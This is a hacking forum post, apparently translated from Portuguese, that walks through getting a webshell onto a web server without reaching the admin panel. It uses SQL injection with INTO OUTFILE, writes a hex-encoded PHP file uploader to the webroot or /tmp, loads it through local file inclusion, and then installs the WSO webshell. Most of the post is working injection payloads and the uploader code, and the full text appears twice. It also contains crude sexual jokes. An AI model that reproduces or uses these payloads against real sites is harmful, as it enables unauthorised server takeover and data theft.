Tweet
Uploading webshell without accessing administration panel
Hi, roommates.
How many times we've found ourselves asking to Goku for the why of everything, isn't? Why I didn't find the administration panel, even after working so much in order to find the login and password?
And so we finally give up, thinking there's no solution. But now you'll see something that will save your soul from this situation.
Not always the administration panel is everything. There are many good things in the life, like the nature, love, woman, vagina, sex and also the SQL language, which will help us to upload our things to the server.
So, let's start?
Needed materials
Now, let's understand what's that.
There are the INTO OUTFILE command, which complements the Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... command and allow us to save a query result into a file. That's its syntax:
I'm using Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... in this example. Maybe afraid with the police, maybe lazy. Up to you.
Ok, let's start attacking getting the current table's columns count. That's my requests:
Cool, there are only 2 columns. We lose some time, but it's ok.
There are a big possibility to have the same amount of selected columns. Therefore:
All right, we could see the numbers "1" and "2" in the page:
Ok, we already can send the files to the server. The problem now is that servers usually blocks too big URLs. So we need to send as less data as possible. But since we want a complete webshell, we can send, firstly, an uploading form.
That's our code:
But we'll need to Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar..., so it will be easier to include it in the URL and in the SELECT. Remember to add "0x" in front of the code.
We'll also need to know the webroot path (the folder where are the website files) from the root. Usually we can see this in the PHP error messages, like "Warning: mysql_fetch_array()". In this case, we've found an error message in another page of the same site, when trying to include an absent file. Check out:
Now we just need to inject that file in the URL
Remember to respect the selected columns count (in this example, 2).
The name I choose was "yeswecan.php", and the file will be in "/var/www/dvwa".
Example:
Now we just need to access "yeswecan.php" and send our webshell 
But, how if...
Hm... shit
This means MySQL server has no permission (CHMOD) to write files in this directory. That's perfectly usual, mainly under Linux servers.
But we're not lost
There are a directory where all users have privilleges to write! Yes, the temporary dir!
In Windows servers, it may be "C:\Temp", "C:\WINDOWS\Temp" or "C:\Users\<username>\AppData\Local\Temp". In *nix, it may be "/var/tmp" or, more often, "/tmp".
In that case, we just change the end of our request, asking the server to save our uploader in the temporary folder.
So:
Check out what we receive:
Don't worry with the error at the top of the page. We already have the uploader inside the server!
But... and now? The /tmp dir isn't accessible by Apache. What must we do?
It's easy, we just need to find some LFI (Local File Inclusion) vulnerability in the same system. This vulnerability, athough often ignored, still saving us too much!
When we found, we just have to include our "/tmp/yeswecan.php"! Check out our uploading form at the top of the page:
We just need to choose our favorite webshell (in this case i'll use WSO2.5) and a valid place to the upload.
If you see "Permission denied" errors you can choose other paths to upload. I suggest posts' images folder, for example.
As we can see, our uploader has returned an "ok". So, let's access our webshell!
Owned.
(0KaL)
How many times we've found ourselves asking to Goku for the why of everything, isn't? Why I didn't find the administration panel, even after working so much in order to find the login and password?
And so we finally give up, thinking there's no solution. But now you'll see something that will save your soul from this situation.
Not always the administration panel is everything. There are many good things in the life, like the nature, love, woman, vagina, sex and also the SQL language, which will help us to upload our things to the server.
So, let's start?
Needed materials
- Your partner (I know you have no woman. I'm saying about your hand)
Now, let's understand what's that.
There are the INTO OUTFILE command, which complements the Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... command and allow us to save a query result into a file. That's its syntax:
SELECT
<data>
INTO OUTFILE "file";I'm using Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... in this example. Maybe afraid with the police, maybe lazy. Up to you.
Ok, let's start attacking getting the current table's columns count. That's my requests:
Código:
id=1' order by 1--+ id=1' order by 100--+ id=1' order by 10--+ id=1' order by 5--+ id=1' order by 3--+ id=1' order by 2--+
There are a big possibility to have the same amount of selected columns. Therefore:
Código:
?id=-1' union all select 1,2--+
Ok, we already can send the files to the server. The problem now is that servers usually blocks too big URLs. So we need to send as less data as possible. But since we want a complete webshell, we can send, firstly, an uploading form.
That's our code:
Código PHP:
<?php if($_SERVER['REQUEST_METHOD']=="POST") { if(move_uploaded_file($_FILES['file']['tmp_name'], $_POST['name'])) { echo 'ok'; } else { echo 'error'; } } else { echo '<form method="post" enctype="multipart/form-data"><input type="file" name="file" /><input type="text" name="name" value="'.dirname(__FILE__).'" /><input type="submit" /></form>'; }
Código:
0x3c3f70687020696628245f5345525645525b27524551554553545f4d4554484f44275d3d3d22504f53542229207b206966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2766696c65275d5b27746d705f6e616d65275d2c20245f504f53545b276e616d65275d2929207b206563686f20276f6b273b207d20656c7365207b206563686f20276572726f72273b207d207d20656c7365207b206563686f20273c666f726d206d6574686f643d22706f73742220656e63747970653d226d756c7469706172742f666f726d2d64617461223e3c696e70757420747970653d2266696c6522206e616d653d2266696c6522202f3e3c696e70757420747970653d227465787422206e616d653d226e616d65222076616c75653d22272e6469726e616d65285f5f46494c455f5f292e2722202f3e3c696e70757420747970653d227375626d697422202f3e3c2f666f726d3e273b207d
Now we just need to inject that file in the URL
Remember to respect the selected columns count (in this example, 2).
The name I choose was "yeswecan.php", and the file will be in "/var/www/dvwa".
Código:
?id=1' UNION ALL SELECT 1,uploader_hexa_code INTO OUTFILE "/var/www/dvwa/yeswecan.php";--+
Código:
?id=1' UNION ALL SELECT 1,0x3c3f70687020696628245f5345525645525b27524551554553545f4d4554484f44275d3d3d22504f53542229207b206966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2766696c65275d5b27746d705f6e616d65275d2c20245f504f53545b276e616d65275d2929207b206563686f20276f6b273b207d20656c7365207b206563686f20276572726f72273b207d207d20656c7365207b206563686f20273c666f726d206d6574686f643d22706f73742220656e63747970653d226d756c7469706172742f666f726d2d64617461223e3c696e70757420747970653d2266696c6522206e616d653d2266696c6522202f3e3c696e70757420747970653d227465787422206e616d653d226e616d65222076616c75653d22272e6469726e616d65285f5f46494c455f5f292e2722202f3e3c696e70757420747970653d227375626d697422202f3e3c2f666f726d3e273b207d INTO OUTFILE "/var/www/dvwa/yeswecan.php";--+
But, how if...
Hm... shit
This means MySQL server has no permission (CHMOD) to write files in this directory. That's perfectly usual, mainly under Linux servers.
But we're not lost
There are a directory where all users have privilleges to write! Yes, the temporary dir!
In Windows servers, it may be "C:\Temp", "C:\WINDOWS\Temp" or "C:\Users\<username>\AppData\Local\Temp". In *nix, it may be "/var/tmp" or, more often, "/tmp".
In that case, we just change the end of our request, asking the server to save our uploader in the temporary folder.
Código:
?id=1' UNION ALL SELECT 1,uploader_em_hexa INTO OUTFILE "/tmp/yeswecan.php";--+
Código:
?id=1' UNION ALL SELECT 1,0x3c3f70687020696628245f5345525645525b27524551554553545f4d4554484f44275d3d3d22504f53542229207b206966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2766696c65275d5b27746d705f6e616d65275d2c20245f504f53545b276e616d65275d2929207b206563686f20276f6b273b207d20656c7365207b206563686f20276572726f72273b207d207d20656c7365207b206563686f20273c666f726d206d6574686f643d22706f73742220656e63747970653d226d756c7469706172742f666f726d2d64617461223e3c696e70757420747970653d2266696c6522206e616d653d2266696c6522202f3e3c696e70757420747970653d227465787422206e616d653d226e616d65222076616c75653d22272e6469726e616d65285f5f46494c455f5f292e2722202f3e3c696e70757420747970653d227375626d697422202f3e3c2f666f726d3e273b207d INTO OUTFILE "/tmp/yeswecan.php";--+
Don't worry with the error at the top of the page. We already have the uploader inside the server!
But... and now? The /tmp dir isn't accessible by Apache. What must we do?
It's easy, we just need to find some LFI (Local File Inclusion) vulnerability in the same system. This vulnerability, athough often ignored, still saving us too much!
When we found, we just have to include our "/tmp/yeswecan.php"! Check out our uploading form at the top of the page:
We just need to choose our favorite webshell (in this case i'll use WSO2.5) and a valid place to the upload.
If you see "Permission denied" errors you can choose other paths to upload. I suggest posts' images folder, for example.
As we can see, our uploader has returned an "ok". So, let's access our webshell!
Owned.
(0KaL)
Comment